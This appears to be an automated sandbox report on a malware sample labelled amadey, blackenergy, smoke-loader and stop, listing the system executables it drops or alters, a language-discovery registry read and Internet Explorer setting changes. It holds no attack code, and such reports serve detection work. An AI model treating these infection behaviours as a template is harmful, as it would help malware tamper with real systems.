File created C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-coresystem-wpr_31bf3856ad364e35_10.0.19041.207_none_4054ef70f69f6ff9\wpr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-systemrestore-main_31bf3856ad364e35_10.0.19041.84_none_3e82ed1fe15c67db\r\rstrui.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-webcamexperience_31bf3856ad364e35_10.0.19041.746_none_4ae21b160a9d5bb2\CameraSettingsUIHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.19041.1288_none_1cec63974464878f\r\SenseIR.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-upnpdevicehost_31bf3856ad364e35_10.0.19041.153_none_aa284d65c7bee591\f\upnpcont.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devicecensus_31bf3856ad364e35_10.0.19041.1_none_65637d0d99e451f6\DeviceCensus.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.1_none_21244f0b33e2b22d\PerceptionSimulationInput.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.19041.610_none_d94fa044111e8308\StartMenuExperienceHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.19041.153_none_1721bd4ad34c0544\r\MusNotifyIcon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_10.0.19041.1_none_987b063fd85ba334\memtest.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Panther\setup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.746_none_7946fb11bf19dc87\r\coredpussvr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.1266_none_802f96a5044b0fbe\wmpconfig.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_netfx4-vbc_exe_b03f5f7f11d50a3a_4.0.15805.0_none_96edd00e05696409\vbc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.746_none_7946fb11bf19dc87\coredpussvr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.19041.1_none_fb337fa99fb8bc2f\BioIso.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..up-deviceencryption_31bf3856ad364e35_10.0.19041.1202_none_4f22e21b58d6c2e3\f\BitLockerDeviceEncryption.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-tapisetup_31bf3856ad364e35_10.0.19041.1_none_1fe438473a878c5c\TapiUnattend.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.19041.264_none_39eaf2470cfe88f0\f\explorer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-remoteposworker_31bf3856ad364e35_10.0.19041.1_none_d570c31a162768ba\RemotePosWorker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-recdisc-main_31bf3856ad364e35_10.0.19041.84_none_7c1f17a9e1beaf63\recdisc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-securitycenter-core_31bf3856ad364e35_10.0.19041.1081_none_8f1e438c6737a711\f\wscadminui.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.19041.572_none_90e9bab3cbbfd71a\djoin.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-thumbexthost_31bf3856ad364e35_10.0.19041.746_none_d8baedf8d09aba05\r\ThumbnailExtractionHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_addinprocess32_b77a5c561934e089_4.0.15805.0_none_faee98a3c711fae7\AddInProcess32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.1288_none_a518f9eb1ab503d0\r\hvix64.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-runonce_31bf3856ad364e35_10.0.19041.1_none_cbabe2205e65787b\runonce.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sctasks_31bf3856ad364e35_10.0.19041.906_none_686405dc140529cf\r\schtasks.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-upnpdevicehost_31bf3856ad364e35_10.0.19041.153_none_9fd3a313935e2396\upnpcont.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wmpdmc-ux_31bf3856ad364e35_10.0.19041.746_none_cc5cbb9556301da3\WMPDMC.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-hvsi-manager_31bf3856ad364e35_10.0.19041.1202_none_7cdad2e52790705d\hvsimgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.19041.746_none_38c6194376a6b88c\f\VSSVC.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.19041.1202_none_3fe90cdb6667211e\wevtutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-csvde_31bf3856ad364e35_10.0.19041.1_none_112f38db81e24102\csvde.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sensordataservice_31bf3856ad364e35_10.0.19041.1_none_b3f4f49ac9993d28\SensorDataService.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1_none_bf506ecc66a800df\poqexec.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-d..ervicing-management_31bf3856ad364e35_10.0.19041.746_none_46f79836a0dc7206\Dism.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-winre-recoverytools_31bf3856ad364e35_10.0.19041.1_none_95938c4a44e792de\ReAgentc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_220320d2c4216035\TiWorker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.19041.1_none_53219a572fef10a2\ctfmon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\resmon.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.19041.1266_none_e40ca34e5de298c9\f\rasdial.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.19041.1237_none_a9b815907b71fe1a\wowreg32.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.264_none_13222f28beaa00a7\r\vmwp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.19041.1_none_f15a0c837b51c5fc\gpresult.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_9204c42a031e28cf\iissetup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.19041.1266_none_4621ad58d5f654dd\f\Robocopy.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_addinprocess32_b77a5c561934e089_10.0.19041.1_none_3700bdc08c446a5c\AddInProcess32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_jsc_b03f5f7f11d50a3a_4.0.15805.0_none_02d98290c2a0aa6b\jsc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.19041.1266_none_d7b5820f5a89765b\f\agentactivationruntimestarter.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ed-chinese-moimeexe_31bf3856ad364e35_10.0.19041.746_none_c3054a007d804943\r\ChsIME.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ncsiuwpapp.appxmain_31bf3856ad364e35_10.0.19041.1052_none_648fbf276da33ed4\r\NcsiUwpApp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sethc_31bf3856ad364e35_10.0.19041.1_none_18b14c7d1478d4cc\sethc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.19041.1_none_36e57bfcb85e0850\SpatialAudioLicenseSrv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000004cdc76ad7de14ec05730e7115b22df1d0b7ace2eb4e8e6fa7a4983117d93bf30000000000e800000000200002000000075e84718a90ce77c1cc94b7b9ee9b13832b2f7b04fe168c1578363b127bb7b4810000000548ef6b0f4a1c9e732c38f49a3526572400000005f449fdef0a4cd49a1a52630c26911741e9b30e0259ca8b672b5b6ce5b777d10ac949c950dc61ce38d3aaeabbfa6ce98842a3938dd2d181a7db1c1451ed07303 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000d3644d84ffa9c76a2f63ca54a37719d44ac725fbd4b4db3953121630c1d7a6a0000000000e800000000200002000000095ddc3410f386218eb9a768d257bc128d3782f8f7a4d06b498bcb7c50c57fa2a50000000a748743fdd08a133a0977e232c079e96a94c657ebefa1da2af1788576d7c6497c7442f64bd51cb89f7c84851a701b9793f10a3c3d4bba6ed0665b359c38a176abaa67fc54e28c4ec68b119df4d8114b4400000002066b86301b003d6b9b6c383182764f4b665cb16be5b340a301285fe83b7af7f35603cdf6c3a4d9cca36e8b9e25f56a8bea988e93e564df4b8cb5b39e81b6014 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000067a75f0bade7600e5a3bd5ac762d5aebc22bd53977530954f7a906e21e2f41b000000000e800000000200002000000068ce645ef73eb645e40191c10b6df822aad2e72222e10dc23a57f75b65285fe61000000062ff78c3f5b3a24b4914b3b179a39a8640000000e5c44eeda090d3619f2ab56e4bb471caba0e9ee1a376cf269cebf0b6c453866ab9a62a51940d66ffb70f4a13baa170134d6c560e41893793f0f623c52dce8a33 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E4A2AADF-58CF-11F0-9B6E-5ED5395D997F} = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
